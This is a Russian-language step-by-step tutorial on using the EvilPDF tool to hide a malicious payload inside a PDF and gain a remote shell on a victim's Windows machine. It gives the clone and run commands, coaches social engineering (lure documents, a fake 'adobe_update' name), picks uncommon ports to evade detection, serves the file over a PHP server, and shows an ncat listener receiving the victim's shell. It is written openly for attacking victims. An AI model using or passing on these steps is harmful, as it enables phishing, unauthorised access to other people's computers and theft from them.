Инструкция по внедрению вируса в PDF

После прочтения данной статьи вы сможете внедрить полезную нагрузку в PDF, отправить ее жертве и получить удаленный доступ к ее компьютеру.

Всем салют, дорогие друзья!
За годы существования формата .pdf в нем появилось множество уязвимостей, которыми пользуются хакеры. Они внедряют пэйлоад (полезную нагрузку,вирус) в PDF, который не вызовет подозрения у жертвы.

Давайте начнем!

EvilPDF

EvilPDF - это инструмент с которым мы и будем сегодня работать. Он представляет из себя небольшую утилиту, написанную на языке python, которая используется для встраивания полезной нагрузки в PDF. Создатели инструмента уделили особое внимание простоте использования своего творения.

Шаг 1: Установка инструмента EvilPDF

Первым шагом будет клонирование репозитория evilpdf с github.

Мы будем использовать хорошо известную команду для клонирования репозитория:

git clone https://github.com/superzerosec/evilpdf

Шаг 2: Установка необходимых зависимостей

После завершения загрузки нам необходимо установить зависимости, необходимые для того, чтобы инструмент работал без ошибок:

cd evilpdf

Шаг 3: Запуск инструмента evilpdf

Теперь мы запустим инструмент evilpdf, чтобы начать процесс внедрения пэйлоада в PDF:

python3 evilpdf.py

Шаг 4: Указываем доступ к исходному pdf-файлу

Как показано на экране выше, мы должны указать путь к исходному pdf-файлу, в который мы собираемся внедрить наш вирус.

Обязательно используйте pdf-файл, представляющий интерес для цели. Убедитесь, что все аспекты заставят жертву открыть файл. Здесь вам придется применить свои навыки социальной инженерии.

Шаг 5: Выбор файла с полезной нагрузкой

На данном этапе мы выберем, какую полезную нагрузку мы хотим внедрить в pdf. Мы можем внедрить пользовательский файл (если вы уже сгенерировали пэйлоад с помощью metasploit, то просто укажите путь к нему на вашем компьютере).

└─$ python3 evilpdf.py

 __________     .__.__ __________________  ___________
 \_   _____/__  _|__|  |\______   \______ \ \_   _____/
  |    __)_\  \/ /  |  | |     ___/|    |  \ |    __)   
  |        \\   /|  |  |_|    |    |    `   \|     \    
 /_______  / \_/ |__|____/____|   /_______  /\___  /    
         \/                               \/     \/     

 v1.1 coded by @linux_choice (twitter)
 github.com/thelinuxchoice/evilpdf
[+] PDF path (Default: adobe.pdf ): /home/toxic/Desktop/lifeguide.pdf
[+] Append custom file? [Y/n]

Шаг 6: Выбор имени файла.

На этом шаге мы должны выбрать имя для файла. Опять же, используйте слова, которые заставят жертву скачать и запустить файл на своем компьютере. В нашем случае мы можем назвать его adobe_update.

Шаг 7: Установка LHOST и LPORT

Здесь необходимо ввести хост, на который мы будет получать данные от жертвы. Вы можете использовать следующую команду, чтобы узнать свой LHOST:

ifconfig

После того, как вы зададите IP-адрес хоста, вам нужно будет выбрать порт.

Эти конфигурации порта и хоста будут использоваться после встраивания полезной нагрузки в PDF.

Вам необходимо использовать менее распространенный порт, чтобы гарантировать успех вашей атаки, поскольку распространенные порты уже используются существующими службами, и любая вредоносная активность на этих портах будет легко обнаружена.

Шаг 8: Установка фишингового url

Когда на следующем шаге потребуется ввести фишинговый url, вы можете оставить его по умолчанию, как показано ниже, и ожидать, пока evilpdf продолжит процесс внедрения пэйлоада в PDF.

url – это страница, на которую будет перенаправлена жертва, когда загрузится наш exe-файл.

Шаг 9: Доставка pdf для получения шелла

Завершив процесс встраивания полезной нагрузки в pdf, мы теперь должны раскрыть наш сервер, чтобы доставить pdf более простым способом на машину жертвы.

Evilpdf предоставляет нам руководство по тому, как это сделать.

В нашем случае мы можем использовать:

php -S 192.168.0.11:3333

Ниже приведен вывод, когда мы выполняем команду в терминале:

$ php -S 192.168.0.11:3333
PHP 7.4.15 Development Server (http://192.168.0.11:3333) started

Как только жертва откроет PDF-файл, который мы назвали в соответствии с интересами жертвы, он попросит пользователя подтвердить, хочет ли он открыть этот файл. Как только жертва подтвердит этот запрос, мы получим удаленное подключение к компьютеру жертвы.

После подключения мы получаем шелл:

[+] Start Listener? [Y/n] y
[+] Listening connection:

Ncat: Version 7.80 ( org/ncat" >https://nmap>org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.0.130.
Ncat: Connection from 192.168.0.130:54784.
Microsoft Windows [Version 10.0.18361.889]
(c) 2019 Microsoft Corporation. All rights reserved.

c:\Users\administrator\Downloads>dir
dir
Volume in drive C has no label.
Volume Serial Number is 7B9Y - 070D

Directory of C:\Users\administrator\Downloads
20/04/2022 4:24 AM <DIR> .
20/04/2022 4:24 AM <DIR> ..
20/04/2022 4:26 AM 20,983,845 (by-Adam-Grant)-Give-and-Take

Заключение

В приведенной выше инструкции мы смогли внедрить пэйлоад в PDF и запустить ее на машине жертвы, получив доступ к ней. Как видите, ничего особо сложного в этом нет.

На сегодня это все. Уверены, что данная информация будет для вас полезна. Благодарим за внимание!